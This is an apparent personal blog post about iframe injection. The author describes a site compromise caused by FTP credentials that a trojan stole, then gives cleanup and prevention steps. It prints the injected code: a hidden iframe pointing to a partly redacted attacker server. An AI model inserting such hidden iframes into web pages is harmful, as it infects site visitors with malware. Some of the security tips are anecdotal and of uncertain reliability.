What is <IFRAME>?

The <iframe> tag defines an inline frame that contains another document. We use <iframe> tag to include another document in inside website document.

For example, I use the following iframe code to insert Salesforce.com content syndicate inside my website. Please refer to the image below.

<iframe id="blockrandom"

name="iframe" src="http://probyte2u.com/salesforce.html"

width="100%"

height="1300"

scrolling="auto"

align="top"

frameborder="0"

class="wrapper">

This option will not work correctly. Unfortunately, your browser does not support inline frames.

</iframe>

Basically now you have some rough idea about <IFRAME> and it's usage !

Now what does IFRAME injection means ?

Iframe injections means attackers or hackers insert their iframe codes inside your website page. They use Trojan malware to do it.

Normally their will target your index.html, index.php, default.php or configuration.php page.

They will insert their codes inside your website, so when visitors visit your page they will download their malicious code inside your personal computer in order to replicate the process and also to retrieve financial and identification details of the visitor.

Their main purpose is for financial gain and some of them use it for their political purpose. They can also infect a lot of pc and use it to launch Distributed Denial of Service (DDoS) attack against their target.

From my own personal experience, I first encounter this problem when I tried to access my website and got the following error.

Parse error: syntax error, unexpected '/' in /home/+++++/public_html/index.php on line 85

So I checked in the index.php file and found the following code inserted inside the index.php file.

The iframe injection was not properly done, with additional "/" symbol at the start of the iframe injection as shown below, it was detected and the website coding does not download malicious code. 

/

<iframe src="http://{URL HAS BEEN REMOVED}.cn:8080/ts/in.cgi?pepsi49" width=125 height=125 style="visibility: hidden"></iframe>

If the iframe injection was done properly, then all the visitors that visit the infected site will most probably get infected with malicious malware.

Sample of Mozilla Warning for Reported Attack Site shown below.

So what i did was that I removed the iframe injection from the infected file and upload the new files. Plus, I change ftp details for the website.

My site was safe for few days, unfortanely the same problem occurs after a while. I was suspucios how the hacker able to access my website.

So I checked with my hosting provider how my website was hacked.

Then only I knew that my personal computer was most probably infected by Trojan virus and the hacker has automated the whole process.

The Trojan virus managed to steal all my websites username and password that was saved in the file transfer protocal software that I used. All the websites that I used using the ftp software was infected with the iframe injection.

Luckily, I got back up files for my website that was not infected.

Since a lot of the files has been infected, I had no other choise but to restore the entire site using the backup file. I changed my ftp username and password.

To prevent the problem from recurring I install Kaspersky Internet Security and but the problem still happen back. (See my latest update below)

I still have not figure out the root cause, so the potential for it to happen back is there !

If your problem is not as serious as mine.

Then you could resolve the problem using the steps below.

How to eliminate this problem

Use Kapersky Antivirus paid version , update the pattern and scan your computer. Clean all infected files in your computer.

How to clean the infected php or html pages in my web site?

1. Refer to Google badaware notice like this

Approximately 6 files have been injected. You can search your index.php, index.html for the lines of codes.

You can also download copies of your public_html if the injected files are too many (zip the public_html or folder by folders. Uncompress the zip file on your desktop. Kapersky will notify you the injected files. Do not clean the files. Just save the log file so you can edit manually. Using this method, your page will not be destroyed or altered by Kapersky.

2. Change your FTP/Cpanel Login information. Avoid using the same password for web registration. Your FTP password should not be recycled. Some fake web sites would harvest this information and perform iframe injection over the web.

3. Sort your files by dates in FTP window. You can check the latest edited pages (or infection date) for injected codes.

4. You can revert to public_html backup – this method is not advisable and should be used as last resort if you could not find the infected pages. If your pages have been infected for more than a month, most probably your backup files also contain the injected codes.

5. Plus remember NOT to safe the username and password of your website inside your file transfer protocal software. From my own experience, the Trojan virus managed to steal the information from the ftp software.

They have injected my site again! (Happened in July 2009)

Problem started when I access my site to upload file to my site. Before that, there was no problem.

Look like I need to iron out the loop holes.

Managed two get my sites back !

I am not very sure, how they did it !

But, I have done some precautionary measure, to prevent it from happening back !

1. I always back up my website content, even before there was any problem. I would recommend you to do so. If your files got infected, you can solve your problem very fast.
2. Always change your cpanel / ftp password after you have uploaded your content to your site.
3. Don't simply upload content via ftp. Because, my problem always start when I ftp the content.
4. Don't keep your password and username in your ftp software.
5. Always scan your PC with paid antivirus, to detect any virus.
6. I am using Google Chrome incognito web browser, to access my cpanel and ftp. I am not this can solve it or not, let me check and see whether it works or not.
7. Don't install lot of unnecessary plugins / modules / components in your content management system website, it takes a lot of effort to clean up. I am waiting for the latest update to clean up all the corrupted files.
8. I asked Kaspesky Lab Support to analyze my personal computer details to check whether there is any virus still resides in my pc. Luckily they didn't found any trace of virus. Please refer to the link below for correspondence between me and Kaspersky Lab.
9. Kaspersky Lab Technical Support Service to Help Detect Virus and Trojan

Still save till now, it's been more than 1 month after writing this article. Hopefully problem will not reoccur !